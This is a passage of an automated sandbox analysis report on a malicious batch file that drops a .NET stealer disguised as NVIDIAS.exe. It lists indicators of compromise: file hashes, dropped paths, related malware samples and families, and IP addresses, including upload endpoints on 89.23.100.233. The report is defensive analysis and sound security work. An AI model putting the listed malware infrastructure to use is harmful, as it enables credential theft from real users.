Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 3gJQoqWpxb.bat

Simulations

Behavior and APIs

Time	Type	Description
11:30:01	API Interceptor	38x Sleep call for process: powershell.exe modified
11:30:25	API Interceptor	75x Sleep call for process: NVIDIAS.exe modified
11:30:34	API Interceptor	2x Sleep call for process: svchost.exe modified
11:30:37	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
140.82.113.4	SecuriteInfo.com.FileRepMalware.16991.21545.exe	Get hash	malicious	Unknown	Browse
	Dekont.jar	Get hash	malicious	STRRAT	Browse
	MDE_File_Sample_1e6015f93d85f7b9e57857c379892348775dbb40.zip	Get hash	malicious	Unknown	Browse
	Invoice - PL.jar	Get hash	malicious	STRRAT	Browse
	OR20240905662201.js	Get hash	malicious	STRRAT	Browse
	OR20240905662201.js	Get hash	malicious	STRRAT	Browse
	OR20240905662201.jar	Get hash	malicious	STRRAT	Browse
	https://github.com/ytisf/theZoo/blob/master/malware/Binaries/Artemis/Artemis.sha256	Get hash	malicious	Unknown	Browse
	swift copy.jar	Get hash	malicious	STRRAT	Browse
	https://pub-9af459faa3e54a63ae5d1f2be8790ad0.r2.dev/get-authenticated.html	Get hash	malicious	Unknown	Browse
89.23.100.233	7fE6IkvYWf.exe	Get hash	malicious	Unknown	Browse	89.23.100.233:1490/upload
	T05Dk6G8fg.exe	Get hash	malicious	Unknown	Browse	89.23.100.233:1488/upload
	3K5MXGVOJE.exe	Get hash	malicious	Unknown	Browse	89.23.100.233:1489/upload
	VaXmr82RIb.exe	Get hash	malicious	Unknown	Browse	89.23.100.233:1488/upload
104.16.184.241	7fE6IkvYWf.exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	T05Dk6G8fg.exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	VaXmr82RIb.exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	Pdf Reader.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	gKWbina3a4.bat	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	uyz4YPUyc9.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	yv7QsAR49V.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	5E3zWXveDN.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	LKxcbzlwkz.exe	Get hash	malicious	AveMaria, KeyLogger, Stealerium	Browse	icanhazip.com/
	9fGsCDYKLV.exe	Get hash	malicious	Flesh Stealer	Browse	icanhazip.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
raw.githubusercontent.com	uZgbejeJkT.bat	Get hash	malicious	Unknown	Browse	185.199.108.133
	ni2OwV1y9u.bat	Get hash	malicious	Unknown	Browse	185.199.108.133
	GdGXG0bnxH.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	LaRHzSijsq.exe	Get hash	malicious	DCRat	Browse	185.199.109.133
	3edTbzftGf.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse	185.199.109.133
	c56uoWlDXp.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	gjvU5KOFhX.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	185.199.110.133
	svhost.vbs	Get hash	malicious	Unknown	Browse	185.199.111.133
	hvqc3lk7ly.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse	185.199.111.133
icanhazip.com	CVmkXJ7e0a.exe	Get hash	malicious	SheetRat	Browse	104.16.185.241
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	104.16.185.241
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	104.16.185.241
	7fE6IkvYWf.exe	Get hash	malicious	Unknown	Browse	104.16.184.241
	iGxCM2I5u9.exe	Get hash	malicious	Flesh Stealer	Browse	104.16.185.241
	T05Dk6G8fg.exe	Get hash	malicious	Unknown	Browse	104.16.184.241
	3K5MXGVOJE.exe	Get hash	malicious	Unknown	Browse	104.16.185.241
	VaXmr82RIb.exe	Get hash	malicious	Unknown	Browse	104.16.184.241
	Pdf Reader.exe	Get hash	malicious	Stealerium	Browse	104.16.184.241
	gKWbina3a4.bat	Get hash	malicious	Stealerium	Browse	104.16.184.241
github.com	uZgbejeJkT.bat	Get hash	malicious	Unknown	Browse	20.233.83.145
	ni2OwV1y9u.bat	Get hash	malicious	Unknown	Browse	20.233.83.145
	c56uoWlDXp.exe	Get hash	malicious	Unknown	Browse	20.233.83.145
	zpbiw0htk6.lnk	Get hash	malicious	Unknown	Browse	185.199.110.133
	in.exe	Get hash	malicious	Babadeda, HTMLPhisher	Browse	20.233.83.145
	https://feji.us/m266he	Get hash	malicious	Unknown	Browse	20.233.83.145
	PixelFlasher.exe	Get hash	malicious	Unknown	Browse	20.233.83.145
	https://github.com/greenshot/greenshot/releases/download/Greenshot-RELEASE-1.2.10.6/Greenshot-INSTALLER-1.2.10.6-RELEASE.exe	Get hash	malicious	Unknown	Browse	20.233.83.145

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GITHUBUS	https://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exe	Get hash	malicious	Unknown	Browse	140.82.113.22
	PO24002292.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	140.82.121.4
	CORREIO BCV.zip.html	Get hash	malicious	Unknown	Browse	140.82.112.22
	https://github.com/karakun/OpenWebStart/releases/download/v1.10.1/OpenWebStart_windows-x64_1_10_1.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	kIMPADTn5g.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	140.82.121.4
	https://github.com/Ultimaker/Cura/releases/download/5.9.0/UltiMaker-Cura-5.9.0-win64-X64.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	https://github.com/bambulab/BambuStudio/releases/download/v01.10.01.50/Bambu_Studio_win_public-v01.10.01.50-20241115162711.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	SWIFT-MT103-17112024.js	Get hash	malicious	STRRAT	Browse	140.82.121.4
	SWIFT-MT103-17112024.js	Get hash	malicious	STRRAT	Browse	140.82.121.4
	Nota1893.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	172.67.164.37
	wf1Ps82LYF.exe	Get hash	malicious	LummaC	Browse	104.21.50.161
	https://share.hsforms.com/1Izw71u6TTr2VFC-t9f1KFgsvgdj	Get hash	malicious	Unknown	Browse	104.18.142.119
	https://qrs.ly/gggdyxx	Get hash	malicious	Unknown	Browse	1.1.1.1
	236236236.elf	Get hash	malicious	Unknown	Browse	104.26.14.131
	https://tinyurl.com/ajdoea10dk66	Get hash	malicious	Unknown	Browse	104.21.96.1
	IMAKBWPY.exe	Get hash	malicious	LummaC	Browse	172.67.219.27
	JIKJCBEX.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	YTRNYRXC.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
MAXITEL-ASRU	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc	Browse	89.23.100.42
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	89.23.100.42
	7fE6IkvYWf.exe	Get hash	malicious	Unknown	Browse	89.23.100.233
	iGxCM2I5u9.exe	Get hash	malicious	Flesh Stealer	Browse	89.23.100.233
	T05Dk6G8fg.exe	Get hash	malicious	Unknown	Browse	89.23.100.233
	3K5MXGVOJE.exe	Get hash	malicious	Unknown	Browse	89.23.100.233
	VaXmr82RIb.exe	Get hash	malicious	Unknown	Browse	89.23.100.233
	Installer_setup32_64x.exe	Get hash	malicious	LummaC, Stealc	Browse	89.23.96.109
	9fGsCDYKLV.exe	Get hash	malicious	Flesh Stealer	Browse	89.23.100.233
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	89.23.100.233
FASTLYUS	uZgbejeJkT.bat	Get hash	malicious	Unknown	Browse	185.199.108.133
	ni2OwV1y9u.bat	Get hash	malicious	Unknown	Browse	185.199.108.133
	236236236.elf	Get hash	malicious	Unknown	Browse	151.101.194.159
	GdGXG0bnxH.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSL813n1NSUgoHlh-2FH8jVXE55TTo10JYMDP3MpP9biJ-2BivxRElKJfGcSf3Wm0bk6-2BuL6x9TaALAI-2BL1qw1Dee2Qg-3DwH82_lUpiXeYCZ5wahax4fkypnG65rENS0eHcuXkODr9BV8nkC0Nc6-2BAihSf0cmYNntTLO4SyowozBXe6Qe-2Bbp-2FFF3a1FIQOXuBqEKUpfXMQ5PPxSuhMxN-2FGKw6aVp7-2FrJaFsaK3MxWcXiB-2FQGWayulE8-2FtCvMhmv4KaADpZ-2B0qQmLVPxqh24uJt9FaNBQBIm1l70gJHtveQ3b-2FplaZ4NS9-2FFv9-2FcAZ4BnOdGLbd-2BNZzE9Ba47yxwqIyGzlJ-2BmDN57eM41CachqUTFf5upDlE1JEwIy6eZ7t9nvf-2Fc9lQV8qupSe0IpWj5cFkfBjNJ9myaj1i3KCzGOXUSk-2F4E-2FHX-2BkuwdmqzU7u2OKMrHZeEXOJLiSw-3D#C	Get hash	malicious	Unknown	Browse	151.101.2.137
	https://simatantincendi.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	https://business.livechathelpsuite.com	Get hash	malicious	Unknown	Browse	151.101.66.137
	fNlxQP0jBz.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	LbgqLv7gT7.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	uZgbejeJkT.bat	Get hash	malicious	Unknown	Browse	185.199.108.133 140.82.113.4
	ni2OwV1y9u.bat	Get hash	malicious	Unknown	Browse	185.199.108.133 140.82.113.4
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	185.199.108.133 140.82.113.4
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	185.199.108.133 140.82.113.4
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	185.199.108.133 140.82.113.4
	KjECqzXLWp.lnk	Get hash	malicious	RHADAMANTHYS	Browse	185.199.108.133 140.82.113.4
	cey4VIyGKh.lnk	Get hash	malicious	RHADAMANTHYS	Browse	185.199.108.133 140.82.113.4
	https://147.45.47.98/error.js	Get hash	malicious	Unknown	Browse	185.199.108.133 140.82.113.4
	ak3o7AZ3mH.exe	Get hash	malicious	Babadeda, Conti, Mimikatz	Browse	185.199.108.133 140.82.113.4

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.13581950617431202
Encrypted:	false
SSDEEP:	384:mJHL7HbahIfcjcidIiBysHciXBs78MmhRht43mKdyrf6YM5J:mJP74rzc8Myr43mNrf6YM5J
MD5:	D94132E6614A2166724BEE3447AFAA45
SHA1:	19EC19D17314C234189DFB0EA83F250AD6C470F9
SHA-256:	949BDB93843A80AF998017B6D28BE4586AC3AB267F9E04789CBCEB1ED782023B
SHA-512:	6608388BD58607B6FBE070BEBB3DB05F31B2366D42F61284EE13D2FC597955DFF4B345F94A18A6BF58F5C072FB172F3CB5F793E1BE8842FE44342FC6C1C9C723
Malicious:	false
Preview:	...........@..@.3...{g.....yo.........<.....).9...y..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................;..........v[.2}c}c.#.........`h.d...............h.<.....6.:......p..*9...y..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xc5fd34de, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1048576
Entropy (8bit):	0.8698155118652139
Encrypted:	false
SSDEEP:	1536:LSB2qSB2gSjlK/LfDalKohVF8/bGLBSBLil2d/3Cr5DHzk/3A5v7GoCnLKxKHKrx:LapaQK0yfOD8F31Xw
MD5:	13FF756982B241EE8C6D5C0F562CEC00
SHA1:	99AD8006B5DBBEA24FE2DB81B722AD76E323488B
SHA-256:	108C5A0E80FAE2046B86A731513F5BAD531A01EEB27C11057C3F4EF8C339C084
SHA-512:	8C4580DACF0174B4BE8E1FC31F156A8B0F76C6579F2E8FD482697365F38AF6A53B533361F9B0A35668D17D7AE8F77F02FB8A00955BB12372F4A5C61DA8BCA4D0
Malicious:	false
Preview:	..4.... ................p..9...y........................0..........\|)."....\|..h.2...........................).9...y..........................................................................................................bJ......n....@...................................................................................................... ........3...{g.....................................................................................................................................................................................................................................#.fh"....\|.....................2"....\|...........................#......h.2.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08264335445940388
Encrypted:	false
SSDEEP:	3:7ltu9113e2lqBj4i4uRFE5/ll/k4tollo0lJlbxvws:hg11uHj3LRi5/llSL
MD5:	59D57D3C0AC216E8FB1BE18AD93087D7
SHA1:	CF63FEFA54F76CD78B52A8490B66F589A095093A
SHA-256:	E6BB063689B45936637865FC6BF288896CFFC1713D73CF07E52B5AB0AB156AF0
SHA-512:	E10DAC54B50A6E665955FF3A394E93BA1B51280BA4AAE3100613C378867AD763986A8965D7FA803465096FDDCFD8792A647A199CD18EBEC809CECE040F10BAA9
Malicious:	false
Preview:	.+......................................*9...y.."....\|.......\|)..............\|)......\|)..C.t.....\|)O...................2"....\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NVIDIAS.exe_7d7dca90318b5fff3d235e3586e41d292c5da1_886ea9ce_12c24859-32ba-4d91-908e-7d18a5d7457f\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.436788635169506
Encrypted:	false
SSDEEP:	192:RGSVqGtSrtmWbk9amo75E6UVWfaD2BHdDu76nfAIO8e:MSVqGEcWbk9ad5Ewa69Du76nfAIO8e
MD5:	6F19AF2AC8C95B2307EE29FD4560D0E6
SHA1:	FDBEAE8C3A4EC3BFE447D8452BFA82702B0D9241
SHA-256:	1353F430C0BEA944651F665DAF865EBAA39EDE61FCEFF64B1BF3807645452A6D
SHA-512:	4DA59CCA7BDDEED64F284341D8CA480FE8ADD7AC02C228A03C095BBD3AB7D61A5888F68EE8574361F716F5450C539D0F25AF3E2BAA61CA2FC00D254EB4A036E3
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.3.5.1.1.6.3.2.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.8.4.0.2.3.5.5.5.3.7.2.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.c.2.4.8.5.9.-.3.2.b.a.-.4.d.9.1.-.9.0.8.e.-.7.d.1.8.a.5.d.7.4.5.7.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.2.7.2.3.0.7.4.-.f.c.8.5.-.4.4.2.1.-.8.a.e.9.-.d.0.3.b.c.f.2.4.8.b.6.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.V.I.D.I.A.S...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.t.e.a.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.2.c.c.-.0.0.0.1.-.0.0.5.0.-.6.4.6.a.-.9.e.c.a.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.9.e.4.0.2.a.8.f.5.c.6.8.0.c.d.8.4.3.1.0.e.a.9.f.b.a.2.e.c.7.0.0.0.0.0.0.0.0.!.0.0.0.0.5.4.8.9.5.4.a.0.2.8.4.e.d.9.d.d.8.8.7.f.b.1.d.3.9.6.7.1.2.8.9.9.7.0.a.a.5.3.4.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A29.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Mon Dec 16 16:30:35 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	257581
Entropy (8bit):	4.4136750514837555
Encrypted:	false
SSDEEP:	1536:SZUA7sm8agh310BojR0spN4uE2aOpVn6rSVXvAc0NMYXLTgdUx1QUBTW++qFZtTc:uUqsm8aUP064uEqpyyhALTgCMqZ7Mic
MD5:	0E72D32A744C0749533575987E540F9B
SHA1:	F2F8CDEDB7C87B2D87E2FF35B8E9077457B801CB
SHA-256:	3808E3F74E99794622EC2890BCFCB8357AFF956A3BCD05DEEF9F2D24F0040F60
SHA-512:	B7A5857D0B700FB52D2873959A1570799A8523D0CA39C5DBEE026510977E4ECD3F5B34A8C7F64E2BCD0CB2813505448B8B31177684FFD9436E611C34607DE754
Malicious:	false
Preview:	MDMP..a..... ........U`g............4............+..H.......<...,3......d%..$F..........`.......8...........T............w...v..........h3..........T5..............................................................................bJ.......5......GenuineIntel...........T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B44.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8282
Entropy (8bit):	3.6745662548864244
Encrypted:	false
SSDEEP:	192:R9l7lZNivG64OFk6YK42ScgmfZBPkpD089bY0sfYIm:R9lnNi+6o6YKpScgmffAYnf+
MD5:	4613A48D63903F557770FE7786F920AC
SHA1:	55733AB9170F633B9C31BE70247AB3914E10E8F5
SHA-256:	A99F25477AE486964A208039FCCDB1172FCA7395873BCFCC80C12CF80D430DFE
SHA-512:	7A1115F8ED67EB44025A607F3586B7D5607DC884A40D5C88D0B85BCDF39774E2803F676B230A9571BB6F2C948D7D7F1DFF2FF673834EBAC415AE4916C09F1916
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.6.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B64.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4850
Entropy (8bit):	4.476267489399379
Encrypted:	false
SSDEEP:	48:cvIwwtl8zsF4e702I7VFJ5WS2Cfjksms3rm8M4JEprPFD+q8vOprlchLBIf5d:uILfFt7GySPf75JsKmchLBIRd
MD5:	323C7140495383BE6787D42977AC2A6C
SHA1:	E299090B708A7ABA3F5B7BE014F47BBA13CCC264
SHA-256:	323D5A01E2DB3A8E893E2FF42CAF93151A9E9D868DBD9B255E654B9F23B29693
SHA-512:	F587C69C61F4D3FE0FBD76FF1BDEAF76F0CA8143887BDF241920F1E2299EC292555212C292ED618A6D1FB89F839C3E163C66ABF59DDE73E1B600549B85E1B1C2
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222977862" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

C:\ProgramData\QQQ\NVIDIAS.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	827904
Entropy (8bit):	7.713074023738123
Encrypted:	false
SSDEEP:	12288:VZkAFJWTLQNWdHSMMsar67G2AB6xUPXVyhXXv3eeDJ+qgTvuYpiebJB7FEnjd1ib:UAFlNWdH2qYLMPue1S2YhbTFggJfvJ
MD5:	2FE8C93D75210E538AEC9062BA29C645
SHA1:	548954A0284ED9DD887FB1D39671289970AA5340
SHA-256:	53C6EF3ED4D5B1758DA8ED974AF09901A9EF9D9C7E77E2AF7B5194CD8214B4F9
SHA-512:	089D69AC48AF9E77209DB87C28719B6567FA8F43375E4F6A6BC9F30BF3A7A3A86E249F1EAB2CB231D5F7B613DB63F6B442AA5F913CA7DF1DBA34B62E17F3F8FB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}..........."...0..............~... ........@.. ....................................`.................................l...(....................................................................................................)..H............text........ ...................... ..`.4Ul....s........................... ..`.+,2................................@....>h"....4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15mlfwau.pcf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_345rq2ap.ftm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cp5zxzto.szi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipcca0ta.aln.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t5esurz3.4we.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
